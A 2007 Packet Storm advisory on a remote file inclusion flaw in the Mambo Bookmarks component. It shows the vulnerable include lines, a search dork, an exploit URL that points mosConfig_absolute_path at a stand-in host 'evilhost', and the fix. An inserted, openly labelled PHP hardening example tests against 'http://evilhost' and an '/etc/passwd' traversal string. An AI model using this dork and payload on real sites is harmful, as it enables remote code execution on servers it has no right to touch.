mambobm.rfi.txt

2007-08-14T00:00:00
ID PACKETSTORM:58507
Type packetstorm
Reporter vitux
Modified 2007-08-14T00:00:00

Description

                                        
                                            `Application : Bookmarks - mambo Component  
  
URL :  
http://mamboxchange.com/frs/download.php/4274/MOS_Com_Bookmarks25-Final_a.zip  
  
Variable $mosConfig_absolute_path is not sanitized; the exploit works with  
register_globals=on  
in components/com_bookmarks/bookmarks_export.php on lines 22, 27 and 29:  
  
require_once( $mosConfig_absolute_path . "/includes/mambo.php" );  
include_once($mosConfig_absolute_path.'/components/com_bookmarks/language/'  
. $mosConfig_lang . '.php');  
include_once($mosConfig_absolute_path.'/components/com_bookmarks/language/english.php');  
  
Exploit:  
~~~~~~~~  
  
dork: "com_bookmarks"  
  
http://www.vuln.com/components/com_bookmarks/bookmarks_export.php?mosConfig_absolute_path=http://evilhost  
  
Fix  
~~~~  
  
Add before the code above:  
defined('_VALID_MOS') or die('Direct access to this location is not  
allowed.');  
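The following is an added example and not code from the advisory or from the Bookmarks component. It places the vulnerable include pattern next to a hardened prologue: the _VALID_MOS guard from the fix above, plus a path validator that refuses stream-wrapper values such as http://evilhost before they reach require_once. The function names prefixed com_bookmarks_ and the temporary Mambo-like directory used for the self-check are assumptions made for illustration only.

```php
<?php
// Added example, not the component's own code. Contrasts the vulnerable
// include with a hardened one and self-checks against constructed inputs.

// --- Vulnerable pattern (as described in the advisory) -------------------
// With register_globals=on, ?mosConfig_absolute_path=http://evilhost makes
// PHP populate $mosConfig_absolute_path from the query string, so this line
// would fetch and execute remote code:
//
//     require_once($mosConfig_absolute_path . '/includes/mambo.php');

// --- Hardened pattern ----------------------------------------------------
// (a) The advisory's fix: refuse direct requests. Mambo's index.php defines
//     _VALID_MOS before loading a component, so a direct hit dies here.
//     (Commented out so the self-check below can run from the CLI.)
//
//     defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

// (b) Defence in depth (assumption, not part of the advisory's fix): never
//     build an include path from a request-controllable variable without
//     validating it. Assumes a Unix-style filesystem layout.
function com_bookmarks_base_path($candidate)
{
    // Any scheme prefix (http://, ftp://, php://, data:) is rejected outright.
    if (!is_string($candidate) || preg_match('#^[a-z][a-z0-9+.\-]*:#i', $candidate)) {
        return false;
    }
    $real = realpath($candidate);
    // Must be an existing local directory that holds the Mambo core loader.
    if ($real === false || !is_dir($real) || !is_file($real . '/includes/mambo.php')) {
        return false;
    }
    return $real;
}

// The language code must be a plain token so $mosConfig_lang cannot be used
// for path traversal; anything else falls back to english.php.
function com_bookmarks_lang_file($base, $lang)
{
    if (!is_string($lang) || !preg_match('/^[a-z][a-z_]*$/i', $lang)) {
        $lang = 'english';
    }
    $file = $base . '/components/com_bookmarks/language/' . $lang . '.php';
    return is_file($file) ? $file : $base . '/components/com_bookmarks/language/english.php';
}

// --- Self-check against a constructed Mambo-like tree --------------------
$tmp = sys_get_temp_dir() . '/mambo_demo_' . getmypid();
mkdir($tmp . '/includes', 0700, true);
mkdir($tmp . '/components/com_bookmarks/language', 0700, true);
file_put_contents($tmp . '/includes/mambo.php', "<?php // core loader stub\n");
file_put_contents($tmp . '/components/com_bookmarks/language/english.php', "<?php // language stub\n");

$cases = array(
    'http://evilhost'    => false,           // the payload shape from the advisory
    'HTTP://EVILHOST/x'  => false,           // case variant
    'php://input'        => false,           // local stream wrapper
    '/nonexistent/path'  => false,           // not a Mambo tree
    $tmp                 => realpath($tmp),  // legitimate base path
);
foreach ($cases as $input => $expected) {
    $got = com_bookmarks_base_path($input);
    printf("%-20s -> %s\n", $input, $got === false ? 'rejected' : 'accepted');
    if ($got !== $expected) {
        die("self-check failed for $input\n");
    }
}

$base = com_bookmarks_base_path($tmp);
// A traversal attempt in the language parameter falls back to english.php.
echo basename(com_bookmarks_lang_file($base, '../../../etc/passwd')), "\n";
echo basename(com_bookmarks_lang_file($base, 'english')), "\n";

// Tidy up the constructed tree.
unlink($tmp . '/components/com_bookmarks/language/english.php');
unlink($tmp . '/includes/mambo.php');
rmdir($tmp . '/components/com_bookmarks/language');
rmdir($tmp . '/components/com_bookmarks');
rmdir($tmp . '/components');
rmdir($tmp . '/includes');
rmdir($tmp);
```

The _VALID_MOS guard alone closes the direct-access route the advisory describes; the validator is there because the underlying fault is trusting a global that register_globals lets a request set, and a component that also stops building include paths from such globals stays safe even if the guard is bypassed elsewhere.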
  
Discovered By : vitux  
Thanks To : #indolinux@dal.net, #sunda@dal.net, #batamhacker@  
dal.net, #malanghackerlink@dal.net  
special To : donny indocom, eko indocom, ^BLaCk_BaNDitS^, urang  
subang sadaya, pokona mah kabeh lah  
mail : vitux.manis@gmail.com, pipit_subang@yahoo.com  
  
# cilacap 12th august 2007  